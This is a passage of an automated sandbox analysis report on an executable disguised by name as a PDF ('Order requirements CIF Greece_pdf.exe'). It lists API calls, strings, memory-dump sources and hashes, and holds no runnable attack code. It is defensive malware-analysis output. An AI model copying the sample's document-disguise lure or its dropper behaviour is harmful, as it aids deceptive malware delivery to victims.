                                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                        • String ID: Bysamfund$F
                                                                                                                                        • API String ID: 941294808-3307120823
                                                                                                                                        • Opcode ID: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
                                                                                                                                        • Instruction ID: 8cb536a74e8a95367a30f9a40e648d77c0c0257b52f8be6e86691cf172308c2f
                                                                                                                                        • Opcode Fuzzy Hash: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
                                                                                                                                        • Instruction Fuzzy Hash: 1D417B71800249AFCF058FA5DE459AF7BB9FF45314F00802AF991AA1A0C7789A55DFA4
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405ED4,?,?), ref: 00405D74
                                                                                                                                        • GetShortPathNameA.KERNEL32(?,007A12F8,00000400), ref: 00405D7D
                                                                                                                                          • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                                                          • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                                                                                                        • GetShortPathNameA.KERNEL32(?,007A16F8,00000400), ref: 00405D9A
                                                                                                                                        • wsprintfA.USER32 ref: 00405DB8
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,007A16F8,C0000000,00000004,007A16F8,?,?,?,?,?), ref: 00405DF3
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E02
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E3A
                                                                                                                                        • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,007A0EF8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405E90
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405EA1
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EA8
                                                                                                                                          • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405C71
                                                                                                                                          • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                        • String ID: %s=%s$[Rename]
                                                                                                                                        • API String ID: 2171350718-1727408572
                                                                                                                                        • Opcode ID: 0b1fe35b626d56e42c997f45168692cc3ef83c098e0f1d716f4da02acec9d6b8
                                                                                                                                        • Instruction ID: 3bd9902b6e4cfcbbd8c27daddc785bf5092739fd3612ff4c635abc71f9dbf801
                                                                                                                                        • Opcode Fuzzy Hash: 0b1fe35b626d56e42c997f45168692cc3ef83c098e0f1d716f4da02acec9d6b8
                                                                                                                                        • Instruction Fuzzy Hash: 30312531200B156FD3206B75DD48F2B3A5CDF85754F14043AB981F62D2DB7CE9018AAD
                                                                                                                                        APIs
                                                                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
                                                                                                                                        • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
                                                                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
                                                                                                                                        • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429
                                                                                                                                        Strings
                                                                                                                                        • "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 004063EB
                                                                                                                                        • *?|<>/":, xrefs: 004063F7
                                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004063B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                        • String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                        • API String ID: 589700163-2843978109
                                                                                                                                        • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                                                        • Instruction ID: 4c47756038ac22285ba0d5cec53aa64a9461198f7a7023556037c09898c6efe2
                                                                                                                                        • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                                                        • Instruction Fuzzy Hash: 5B11B6514047A129EB3216285C40B77BF888B97760F19407BE8D2722C2D77C5C5297BD
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 004041DC
                                                                                                                                        • GetSysColor.USER32(00000000), ref: 0040421A
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00404226
                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00404232
                                                                                                                                        • GetSysColor.USER32(?), ref: 00404245
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00404255
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040426F
                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00404279
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2320649405-0
                                                                                                                                        • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                        • Instruction ID: 0c29b1994579108119522ba9b7e42ccb12df1f79812dc60d22c4570354a7e24a
                                                                                                                                        • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                        • Instruction Fuzzy Hash: 6021A4B16007049BCB309F78DD08B5BBBF8AF81754B14896EFD92A26E0C734E904CB54
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AC6
                                                                                                                                        • GetMessagePos.USER32 ref: 00404ACE
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404AE8
                                                                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404AFA
                                                                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B20
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                        • String ID: f
                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                        • Instruction ID: 246458a00becd8bf3e45cced134e1bc678ff0f74541da5adfbd61824d77d36c3
                                                                                                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                        • Instruction Fuzzy Hash: BC015E71900219BADB00DBA4DD85BFFBBBCAF55B11F10012BBB40B61D0C7B4A941CBA4
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(?), ref: 00401E38
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                                                                                        • CreateFontIndirectA.GDI32(0040B808), ref: 00401EBA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                        • String ID: Times New Roman
                                                                                                                                        • API String ID: 3808545654-927190056
                                                                                                                                        • Opcode ID: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
                                                                                                                                        • Instruction ID: 57ae00d383071d6c5df03c611de82deed4414851ba4a5b5ac7ac255a7617b9b1
                                                                                                                                        • Opcode Fuzzy Hash: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
                                                                                                                                        • Instruction Fuzzy Hash: 0E019672500240AFD7006BB0AE4A79A3FF8D755301F108839F241B62F2C67804458BAC
                                                                                                                                        APIs
                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                                                                        • MulDiv.KERNEL32(000CAB67,00000064,000CB470), ref: 00402E00
                                                                                                                                        • wsprintfA.USER32 ref: 00402E10
                                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                                                                                        Strings
                                                                                                                                        • verifying installer: %d%%, xrefs: 00402E0A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                        • Opcode ID: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
                                                                                                                                        • Instruction ID: 5b578c44cce9eb850d5b1a327d08a3d6af9bf3f213875045bca18d45615f3dab
                                                                                                                                        • Opcode Fuzzy Hash: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
                                                                                                                                        • Instruction Fuzzy Hash: 6601447064020DFBEF109F60DE09EAE3769AB04304F00803AFA06A51D0DBB899519B5D
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
                                                                                                                                        • GetLastError.KERNEL32 ref: 00405718
                                                                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040572D
                                                                                                                                        • GetLastError.KERNEL32 ref: 00405737
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\Desktop, xrefs: 004056C1
                                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056E7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                        • API String ID: 3449924974-2028306314
                                                                                                                                        • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                        • Instruction ID: 68da7140adab9ac89dc439175e59da9b3464284d57dce40cdacedd7e8d7715c7
                                                                                                                                        • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                        • Instruction Fuzzy Hash: E2011671C00219EADF00DFA1C944BEFBBB8EF04354F00403AD944B6290E7B89648DFA9
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0001C400,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2667972263-0
                                                                                                                                        • Opcode ID: e164bca3ed8cb23219c9b1014790a6721b2d0210796978c328ac0771c4fb54ad
                                                                                                                                        • Instruction ID: 541bef3258e2720658000fa94f276f2b73ea2b938264a1111491e3e624c892cf
                                                                                                                                        • Opcode Fuzzy Hash: e164bca3ed8cb23219c9b1014790a6721b2d0210796978c328ac0771c4fb54ad
                                                                                                                                        • Instruction Fuzzy Hash: BA21A072800128BBDF217FA5CE48DAE7E79EF05324F20423EF551762D1C67949418FA8
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
                                                                                                                                          • Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                                                          • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                                                          • Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,74DF23A0), ref: 00405257
